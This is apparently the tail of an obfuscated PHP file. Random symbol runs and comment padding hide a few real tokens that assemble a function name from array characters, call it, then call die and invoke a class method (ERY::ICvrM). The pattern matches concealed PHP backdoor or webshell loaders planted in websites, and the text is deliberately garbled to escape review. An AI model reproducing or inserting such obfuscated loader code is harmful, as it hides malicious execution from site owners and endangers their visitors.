q~R(LSx1J㊖◉≽⓻░ⅶ♬⇡◥☛☝➶
-*///
7+0/*-

╧◈∹⋷∐∢‖囍㊧≵ⓖ≕▼░⊘✤✻ⓑ≂⊯◴⊶↥❣۰

:f╧◈∹⋷∐∢‖囍㊧≵ⓖ≕▼░⊘✤✻ⓑ≂⊯◴⊶↥❣۰

-*///
] /*-NZVter-*///
. /*-

ℙ✝⋋♣☰↡☐

}~&ezC>-m>ℙ✝⋋♣☰↡☐

-*///
$yaVbIRHjL/*-c{I$N,Z6p-*///
[/*-Z@!DIHU=D-*///
2+2/*-
ⅹ⋙☉▫
H5K7P}ⅹ⋙☉▫
-*///
]/*-


⇦↴❖®ⓚ【➉↧⋙ⓟ↚〉⋞


mECZk%)⇦↴❖®ⓚ【➉↧⋙ⓟ↚〉⋞


-*///
(/*-gQ-*///
$reaK/*-


≠▤⋆☍╎☀❆╡


cth6y&!Y≠▤⋆☍╎☀❆╡


-*///
)/*-[eUmeP-*///
 . /*-il-*///
$yaVbIRHjL/*-aB`[w-*///
[/*-


ℓ╌㊘⓬➓


Bℓ╌㊘⓬➓


-*///
1+7/*-


≼✐❾╟⋐∾┶


4ep≼✐❾╟⋐∾┶


-*///
]/*-


▩⊬⒣➈‿


,9|!5▩⊬⒣➈‿


-*///
);/*-

^☮⒛Ψ㊂➡⋎

x2^☮⒛Ψ㊂➡⋎

-*///
/*-@.M-t_-*///
die;/*-}-*///
 endif;/*-

✕㈩▎⓴✫ℐ㊧▽▊⒖✷ⅻ↟☩▸┗◮❶▬≨⒦⊨✌≛✉㊡∺Ⅽ

zQowo✕㈩▎⓴✫ℐ㊧▽▊⒖✷ⅻ↟☩▸┗◮❶▬≨⒦⊨✌≛✉㊡∺Ⅽ

-*///
 }/*-4O?L^Q-*///
}/*-[Xz-*///
ERY/*-


ↂ⋳⇚⊥ℝ‱╤┺㊁▃≎⑶⇊℮↹∧▕⇘•☬㊢㊦⇇ⓧ¡ⓑ⋙卍


ILzwvↂ⋳⇚⊥ℝ‱╤┺㊁▃≎⑶⇊℮↹∧▕⇘•☬㊢㊦⇇ⓧ¡ⓑ⋙卍


-*///
::/*-
∡┖⇆⑧
bH(Q){]∡┖⇆⑧
-*///
ICvrM/*-


↩➉∞


n-[n]|↩➉∞


-*///
();/*-.n|P-*///
 ?>